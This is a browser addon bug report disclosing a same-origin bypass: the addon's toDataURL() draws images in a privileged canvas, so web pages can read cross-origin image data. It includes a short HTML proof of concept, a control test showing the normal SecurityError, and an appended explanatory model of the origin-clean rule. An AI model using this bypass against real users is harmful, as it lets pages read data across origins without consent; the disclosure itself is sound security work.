Comment 0 for bug 1069817

Chris Coulson (chrisccoulson) wrote:

This addon exposes a toDataURL() function to the web which allows content to convert an image (specified by a URL) to a data URI. It seems to work by drawing the image to a canvas and using the canvas.toDataURL() mechanism. However, this function seems to bypass all same-origin checks and returns valid data even if the image URL doesn't have the same origin as the document URL.

canvas.toDataURL() will throw a SecurityError exception if the canvas is not origin-clean. A canvas is not origin clean if you call ctx.drawImage() with a URL which does not have the same origin as the document that the canvas is in. However, the canvas used for the conversion is created in chrome context, so it has full privileges and the usual security mechanisms are bypassed completely.

This can be reproduced with the following test case (I loaded this at http://localhost/test.html):

<html>
<head></head>
<body>
<p id="foo"/>
<script type="text/javascript">
    // Ask the addon to convert a cross-origin image to a data URI.
    // The callback receives the resulting data URI in its second argument,
    // which is written into the page without any same-origin check.
    window.external
          .getUnityObject(1)
          .toDataURL("http://www.ubuntu.com/sites/default/themes/ubuntu10/images/footer_logo.png",
                     function(a, b) {
        document.getElementById("foo").innerHTML = b;
    });
</script>
</body>
</html>

In this example, you will see that toDataURL() throws as expected and an alert appears ("The operation is insecure"):

<html>
<head></head>
<body>
<p id="foo"/>
<script type="text/javascript">
    var img = new Image();
    var canvas = document.createElement('canvas');
    var ctx = canvas.getContext('2d');
    img.onload = function() {
        try {
            // Drawing a cross-origin image taints the canvas (it is no longer
            // origin-clean), so the following toDataURL() throws a SecurityError.
            ctx.drawImage(img, 0, 0);
            document.getElementById("foo").innerHTML = canvas.toDataURL();
        } catch(e) { alert(e); }
    };

    img.src = "http://www.ubuntu.com/sites/default/themes/ubuntu10/images/footer_logo.png";
</script>
</body>
</html>
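As an added illustration (not part of the bug report or the addon), the following Node-runnable model shows the origin-clean rule that a content-context canvas enforces and that the chrome-context canvas described above skips: the same-origin comparison of scheme, host and port, the taint flag set by a cross-origin drawImage(), and the SecurityError raised by toDataURL() once the canvas is tainted. The class and function names are hypothetical, and the model ignores CORS-approved images for brevity.

```javascript
// Added example: a minimal model of the canvas origin-clean check.
// Default ports per scheme so "http://host" and "http://host:80" match.
const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

// Serialise a URL to its origin tuple (scheme, host, port).
function originOf(urlString) {
  const u = new URL(urlString);
  const port = u.port || DEFAULT_PORTS[u.protocol] || "";
  return `${u.protocol}//${u.hostname}:${port}`;
}

// Same-origin comparison used by the origin-clean check.
function isSameOrigin(documentUrl, resourceUrl) {
  return originOf(documentUrl) === originOf(resourceUrl);
}

// Hypothetical canvas that tracks its origin-clean flag, as a canvas created
// in content context does. `documentUrl` is the page the canvas lives in.
class OriginTrackingCanvas {
  constructor(documentUrl) {
    this.documentUrl = documentUrl;
    this.originClean = true;
    this.pixels = [];
  }

  // Drawing a cross-origin image taints the canvas; the draw itself succeeds.
  drawImage(imageUrl, pixelData) {
    if (!isSameOrigin(this.documentUrl, imageUrl)) this.originClean = false;
    this.pixels.push(pixelData);
  }

  // Export is refused once the canvas is tainted, matching the
  // "The operation is insecure" SecurityError seen in content.
  toDataURL() {
    if (!this.originClean) {
      const err = new Error("The operation is insecure.");
      err.name = "SecurityError";
      throw err;
    }
    // Constructed encoding: base64 of the concatenated sample pixel data.
    return "data:image/png;base64," +
      Buffer.from(this.pixels.join("")).toString("base64");
  }
}
```

A chrome-privileged canvas behaves as if `originClean` were never cleared, which is exactly why the addon returns data for the ubuntu.com image while the content-context canvas in the second test case throws.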